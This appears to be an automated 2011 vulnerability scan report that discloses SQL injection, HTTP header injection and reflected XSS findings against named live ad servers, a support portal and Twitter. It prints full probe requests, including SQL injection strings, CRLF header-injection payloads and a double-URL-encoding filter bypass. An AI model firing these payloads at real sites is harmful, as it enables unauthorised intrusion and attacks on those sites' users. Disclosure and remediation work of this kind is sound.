XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10312011

Report generated by XSS.CX at Tue Nov 01 07:11:34 CDT 2011.

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Loading



1. SQL injection

1.1. http://a.tribalfusion.com/j.ad [a parameter]

1.2. https://portal.teamsupport.com/login.aspx [OrganizationID parameter]

1.3. http://twitter.com/account/bootstrap_data [k cookie]

2. HTTP header injection

2.1. http://adserver.adtechus.com/ [CRID parameter]

2.2. http://adserver.adtechus.com/ [PLID parameter]

2.3. http://adserver.adtechus.com/ [adlink|3.0|5345|2221988|1|16|AdId parameter]

2.4. http://adserver.adtechus.com/ [cid parameter]

2.5. http://adserver.adtechus.com/ [name of an arbitrarily supplied request parameter]

2.6. http://bidder.mathtag.com/notify [exch parameter]

2.7. http://d.adroll.com/pixel/3LFYGW2GY5AUNBGJEFKFW7/GGBU6EIY6FGOVO4H7YOUOC [REST URL parameter 2]

2.8. http://d.adroll.com/pixel/3LFYGW2GY5AUNBGJEFKFW7/GGBU6EIY6FGOVO4H7YOUOC [REST URL parameter 3]

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/adj/q1.politico/home_run_of [REST URL parameter 2]

3.2. http://a.collective-media.net/adj/q1.politico/home_run_of [REST URL parameter 3]

3.3. http://a.collective-media.net/adj/q1.politico/home_run_of [name of an arbitrarily supplied request parameter]

3.4. http://a.collective-media.net/adj/q1.politico/home_run_of [sz parameter]

3.5. http://a.collective-media.net/cmadj/q1.politico/home_run_of [REST URL parameter 1]

3.6. http://a.collective-media.net/cmadj/q1.politico/home_run_of [REST URL parameter 2]

3.7. http://a.collective-media.net/cmadj/q1.politico/home_run_of [REST URL parameter 3]

3.8. http://a.collective-media.net/cmadj/q1.politico/home_run_of [sz parameter]

3.9. http://ad.coupons.com/st [name of an arbitrarily supplied request parameter]

3.10. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.11. http://ad.turn.com/server/pixel.htm [sp parameter]

3.12. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.13. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.14. http://adnxs.revsci.net/imp [Z parameter]

3.15. http://adnxs.revsci.net/imp [s parameter]

3.16. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

3.17. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

3.18. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

3.19. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

3.20. http://adserving.cpxinteractive.com/st [ad_size parameter]

3.21. http://adserving.cpxinteractive.com/st [section parameter]

3.22. http://api.bizographics.com/v2/profile.redirect [api_key parameter]

3.23. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.24. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.25. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.26. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.27. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.28. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.29. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.30. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.31. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

3.32. http://cdn.w55c.net/i/0RX1mACGyl_437413582.html [ci parameter]

3.33. http://cdn.w55c.net/i/0RX1mACGyl_437413582.html [ei parameter]

3.34. http://cdn.w55c.net/i/0RX1mACGyl_437413582.html [ob parameter]

3.35. http://connexity.net/c/cse [E parameter]

3.36. http://connexity.net/c/cse [J parameter]

3.37. http://connexity.net/c/cse [L parameter]

3.38. http://couponbar.coupons.com/adblob.asp [AdSize parameter]

3.39. http://couponbar.coupons.com/adblob.asp [npage parameter]

3.40. http://couponbar.coupons.com/adblob.asp [pzn parameter]

3.41. http://couponbar.coupons.com/adblob.asp [spage parameter]

3.42. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 2]

3.43. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 3]

3.44. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 4]

3.45. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 5]

3.46. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [flash parameter]

3.47. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [name of an arbitrarily supplied request parameter]

3.48. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [pid parameter]

3.49. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [pub parameter]

3.50. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [r parameter]

3.51. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [redir parameter]

3.52. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [time parameter]

3.53. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

3.54. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

3.55. http://mediaservices-d.openxenterprise.com/w/1.0/afr [auid parameter]

3.56. http://mediaservices-d.openxenterprise.com/w/1.0/afr [cb parameter]

3.57. http://mediaservices-d.openxenterprise.com/w/1.0/afr [name of an arbitrarily supplied request parameter]

3.58. http://mediaservices-d.openxenterprise.com/w/1.0/afr [rm parameter]

3.59. https://portal.teamsupport.com/Telerik.Web.UI.WebResource.axd [_TSM_HiddenField_ parameter]

3.60. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

3.61. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

3.62. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

3.63. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

3.64. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

3.65. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

3.66. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

3.67. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

3.68. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

3.69. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

3.70. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

3.71. http://tag.contextweb.com/TagPublish/getjs.aspx [publisherID parameter]

3.72. http://tag.contextweb.com/TagPublish/getjs.aspx [siteID parameter]

3.73. http://www.lijit.com/delivery/fp [n parameter]

3.74. http://adnxs.revsci.net/imp [Referer HTTP header]

3.75. http://adserving.cpxinteractive.com/st [Referer HTTP header]

3.76. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [Referer HTTP header]

3.77. http://www.kayak.com/ [Referer HTTP header]

3.78. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]



1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://a.tribalfusion.com/j.ad [a parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the a parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /j.ad?flashVer=10&ver=1.21&th=7164944469&tagKey=987828525&site=ustream&adSpace=ros&center=1&url=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=7808693&a=1'%20and%201%3d1--%20&rnd=7809966 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: ANON_ID=awnaaayOZbSZcCJTyKqIeGeC1GUn1ZbTSZcOZbZb562ZdefnPf5SXAUtaKeP7Crah2bJOZaxe9Zdc0lqGbrMqWl45yYFHURgr1C5bJph9CNktOynZaj1kgE832M5UlcIQGsKSvEnMb0yhxYXCuuZbY7DF2WeZdxyZcDsZbJcyE7KrZdEjyjng52Zc7VFVZa7HF2NK6edkeGPpmmbbpE9i3xYQqInRfgvL78RPGNdMgmJZat74R0wVQYjArbw5I0qlDb0QirIQ3DxU4uRIxLuKBMrZaCmkZd5P5cJEIuasfVFg4Qp3bnTqZbvmWwyY4pICrV0XAmxGMpEuQZcoLNwooMZcPfBR2dpCuK3703UgmdQ5MAurBOVIaUHg8FaBB9MoMhYpqIjThXDTDfGgXegBPWYG5rJKwFAhNGYdr0A56o

Response 1

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=avncyBtMPmZcbTgUuMEGcaEWEj2XKjg9XitwCe6eKnafiZdjAtwefY6oKr6a2WnchZcXZaZdtKAyajqpWWN1Zaap9pZbflsZdNRtveZdSHFB7SkShvXlvEy0yZa7xIDyOSRWTJABmbVHc13L7yE7QSDE5daQnYplnMBZcxsbXriP3qZaYPYJShXqsrkEjAqOifJYQQXdbLbU1qeMftsG7M2UmZdog394ScMfZcZcnBuGkYPVgVnbkLdmUuJcsfCYLYynn35H31Zd7vgeW2E8ZbDHAjZbZduZb7ZdxZbBVEwl0HRpRqa22pUt2R9Uyw4HInf90wZbyXtZb6ZauUBovG9UHZb7PuQMTFxDsf3m5ZcZbAVSJauDlNpVIutTqBNs9RtZaoJZaqB6Wqd4gjTb3G99bbCA1SZaGjDMg82cCmOptS8835iAv1FiUN1YTriZavTZa; path=/; domain=.tribalfusion.com; expires=Sun, 29-Jan-2012 19:07:15 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 394
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/aumNnA0U3DUAmp4PnbPAMD4dQyXdrZcpdEv5AZbP5Gj6VsY8WVb8RAQnUWFVWr7P2UerWEUmVqF9STYHSVjJPbupPHviWGnT2FmroWZaOYqyw4dnZbQVZbZa46nIod6nVWF9XFv9YFFfXaisRrMFTrr4Wtr1mbQx2cfFoKmfNQ/http://www.fightarthritispain.org"><img src="http://cdn5.tribalfusion.com/media/2468066.gif" border=0 height=60 width=468 ><\/a><\/center>');

Request 2

GET /j.ad?flashVer=10&ver=1.21&th=7164944469&tagKey=987828525&site=ustream&adSpace=ros&center=1&url=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=7808693&a=1'%20and%201%3d2--%20&rnd=7809966 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: ANON_ID=awnaaayOZbSZcCJTyKqIeGeC1GUn1ZbTSZcOZbZb562ZdefnPf5SXAUtaKeP7Crah2bJOZaxe9Zdc0lqGbrMqWl45yYFHURgr1C5bJph9CNktOynZaj1kgE832M5UlcIQGsKSvEnMb0yhxYXCuuZbY7DF2WeZdxyZcDsZbJcyE7KrZdEjyjng52Zc7VFVZa7HF2NK6edkeGPpmmbbpE9i3xYQqInRfgvL78RPGNdMgmJZat74R0wVQYjArbw5I0qlDb0QirIQ3DxU4uRIxLuKBMrZaCmkZd5P5cJEIuasfVFg4Qp3bnTqZbvmWwyY4pICrV0XAmxGMpEuQZcoLNwooMZcPfBR2dpCuK3703UgmdQ5MAurBOVIaUHg8FaBB9MoMhYpqIjThXDTDfGgXegBPWYG5rJKwFAhNGYdr0A56o

Response 2

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aWncyBujieZdC7Yx43dhW6d4cfPR16skIPD4PIvbvbkjlVDZbFk6ZcYPDGqaMYEQgixB7ZbqZcMwTFVyb8mm2fqjdAfldha1aBdFS8ujVGwW2UvhL6jYNTCPLhpoV0D4giuoqVMBInR9vqj3mDbUGZaboXZcFV3QOqWv4nOiAW07SuwKeuqNPaVFNtZbyicN2encey7qW763YjomQL5cQjxeJTPpN3d1sGLXWC0SR0RSnIGdAw42RNb7j6XjvZcVxND1xZbDK2W4BAUUIPQUZc5uR73j8xrNZaSbVOXbfAQ9fDuADZanJKZbZaomZbWIYqOtMQAvQXtgclRoTZaRxUARrS7v1eNq4AHXHEauRLawFmtMTQyRBsGpx4eIGbnTsOMBkygADltlGkvYCZayKPQp6YVZcy2pVYDKf2jMSybOqnwfRr9yXjE; path=/; domain=.tribalfusion.com; expires=Sun, 29-Jan-2012 19:07:16 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 384
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/aVmNnASGbZa5AUZcodanTtQ80Urj1bJjXaisRFFEUbBYTdYXmFJxPF7MYqFt3TJa5TU5maJE1bjcWHb0mAUKnV7mmHnJ3TYh5t6m3mBGmrnZb0GMXYsMV0VBNnTBS5UQTVb7DWPM4REM0QsvrPW7u0tFqVmbpPF3knmf6ro/http://www.liveunited.org"><img src="http://cdn5.tribalfusion.com/media/2468036.jpeg" border=0 height=60 width=468 ><\/a><\/center>');

1.2. https://portal.teamsupport.com/login.aspx [OrganizationID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://portal.teamsupport.com
Path:   /login.aspx

Issue detail

The OrganizationID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OrganizationID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /login.aspx?ReturnUrl=%2fprotected%2fjustarticle.aspx%3fOrganizationID%3d305383%26ArticleID%3d4979&OrganizationID=305383'&ArticleID=4979 HTTP/1.1
Host: portal.teamsupport.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://portal.teamsupport.com/login.aspx?ReturnUrl=%2fprotected%2fjustarticle.aspx%3fOrganizationID%3d305383%26ArticleID%3d4979&OrganizationID=305383&ArticleID=4979
Cookie: ASP.NET_SessionId=q5cuoojovmirb4451hesgsbt
Content-Type: application/x-www-form-urlencoded
Content-Length: 559

__VIEWSTATE=%2FwEPDwULLTE4NTcyNzQwMjQPZBYEAgEPZBYEAgEPFgIeBGhyZWYFDmNzcy9PcmFuZ2UuY3NzZAICDxYCHgRUZXh0ZWQCAw9kFgQCEw8WAh8ABSZCYXNpY1BvcnRhbC5hc3B4P09yZ2FuaXphdGlvbklEPTMwNTM4M2QCGw8PFgIfAWVkZBgBBR5fX0
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 7260
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR CUR TAI PSA IVA IVD HIS OUR DEL SAM OTR UNR STP UNI"
Date: Mon, 31 Oct 2011 19:15:13 GMT

<html>
<head>
<title>Unclosed quotation mark after the character string ''.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;
...[SNIP]...

1.3. http://twitter.com/account/bootstrap_data [k cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://twitter.com
Path:   /account/bootstrap_data

Issue detail

The k cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the k cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the k cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /account/bootstrap_data?aaaa=bbbb%22%3Ess&ccc=dddd&11111=22222&r=0.49585987956606903 HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cookie: guest_id=v1%3A131220472331773196; __qca=P0-140711599-1316475142506; __utma=43838368.1381732871.1312402661.1318449270.1318542605.5; __utmz=43838368.1318542605.5.5.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=43838368.lang%3A%20en; k=10.34.251.138.1319989287408771%2527; original_referer=ZLhHHTiegr9pnB4MD8ZNfG3v4RAV6ZPG0MrNsX9zrr2ma9yjqlvo%2BQWfDHp1zfhS; external_referer=ZLhHHTiegr9pnB4MD8ZNfG3v4RAV6ZPG0MrNsX9zrr2ma9yjqlvo%2BQWfDHp1zfhS%7C0; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCKtmelszASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJThm%250AZTZmOGNjN2NmMjY4ZGY1ZDE1Yjc0NmNlYTlhOTk1--0403c34742ccbef4b257f481841eefe9d0e00b15

Response 1

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:36:51 GMT
Status: 200 OK
X-Transaction: bc69ff5ab1d365f5
ETag: "72fb0adc37f1bc529f28d2b9b4ab3365"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 31 Oct 2011 19:36:51 GMT
X-Runtime: 0.06115
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e9d36f797638f7f45e7dadfb938ca04ab249d209
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCKtmelszAToMY3NyZl9pZCIlZmMzZjlmNmU4%250AZTk1MDBlMmY3NzRiZWFhNjg1ZjllYWUiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiU4ZmU2%250AZjhjYzdjZjI2OGRmNWQxNWI3NDZjZWE5YTk5NQ%253D%253D--2342bd9082128f8246c20053d4a0ef79b26fe626; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 25478
Server: tfe

{"requestCacheSeedData":[],"twttr":{"payload":{"profiling":false,"conditionalTemplates":{}},"isPreflight":false,"languages":[{"css_classes":"western nl","name":"Nederlands","localized_name":"Dutch","c
...[SNIP]...
HowToBeAGentleman moves to Saturdays 8:30\/7:30c Beginning October 15th!","screen_name":"How2BeGentleman"},{"name":"Kickstarter","profile_image_url":"http:\/\/a1.twimg.com\/profile_images\/1150349488\/stacked_logo_twitter_2_normal.jpg","id":16186995,"description":"Kickstarter is the world's largest funding platform for creative projects.","screen_name":"kickstarter"},{"name":"OMGFacts","profile_image_url
...[SNIP]...

Request 2

GET /account/bootstrap_data?aaaa=bbbb%22%3Ess&ccc=dddd&11111=22222&r=0.49585987956606903 HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cookie: guest_id=v1%3A131220472331773196; __qca=P0-140711599-1316475142506; __utma=43838368.1381732871.1312402661.1318449270.1318542605.5; __utmz=43838368.1318542605.5.5.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=43838368.lang%3A%20en; k=10.34.251.138.1319989287408771%2527%2527; original_referer=ZLhHHTiegr9pnB4MD8ZNfG3v4RAV6ZPG0MrNsX9zrr2ma9yjqlvo%2BQWfDHp1zfhS; external_referer=ZLhHHTiegr9pnB4MD8ZNfG3v4RAV6ZPG0MrNsX9zrr2ma9yjqlvo%2BQWfDHp1zfhS%7C0; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCKtmelszASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJThm%250AZTZmOGNjN2NmMjY4ZGY1ZDE1Yjc0NmNlYTlhOTk1--0403c34742ccbef4b257f481841eefe9d0e00b15

Response 2

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:36:52 GMT
Status: 200 OK
X-Transaction: 90744c629456d446
ETag: "011492e3dcf4fe05e44956774a7acfbc"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 31 Oct 2011 19:36:52 GMT
X-Runtime: 0.05344
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 6f3092b2ceea06aa42e9c3380e4212554bede1fe
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCKtmelszAToMY3NyZl9pZCIlZmMzZjlmNmU4%250AZTk1MDBlMmY3NzRiZWFhNjg1ZjllYWUiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiU4ZmU2%250AZjhjYzdjZjI2OGRmNWQxNWI3NDZjZWE5YTk5NQ%253D%253D--2342bd9082128f8246c20053d4a0ef79b26fe626; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 25297
Server: tfe

{"requestCacheSeedData":[],"twttr":{"payload":{"profiling":false,"conditionalTemplates":{}},"isPreflight":false,"languages":[{"css_classes":"western nl","name":"Nederlands","localized_name":"Dutch","c
...[SNIP]...

2. HTTP header injection  previous  next
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://adserver.adtechus.com/ [CRID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /

Issue detail

The value of the CRID request parameter is copied into the Location response header. The payload 29621%0d%0a6044376590c was submitted in the CRID parameter. This caused a response containing an injected HTTP header.

Request

GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=29621%0d%0a6044376590c&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002 HTTP/1.1
Host: adserver.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Location: http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=29621
6044376590c
&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002
Content-Length: 0


2.2. http://adserver.adtechus.com/ [PLID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /

Issue detail

The value of the PLID request parameter is copied into the Location response header. The payload ee682%0d%0a247f36ca75a was submitted in the PLID parameter. This caused a response containing an injected HTTP header.

Request

GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq3710&PLID=ee682%0d%0a247f36ca75a&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002 HTTP/1.1
Host: adserver.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Location: http://www.coupons.com/alink.asp?go=13306iq3710&PLID=ee682
247f36ca75a
&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002
Content-Length: 0


2.3. http://adserver.adtechus.com/ [adlink|3.0|5345|2221988|1|16|AdId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /

Issue detail

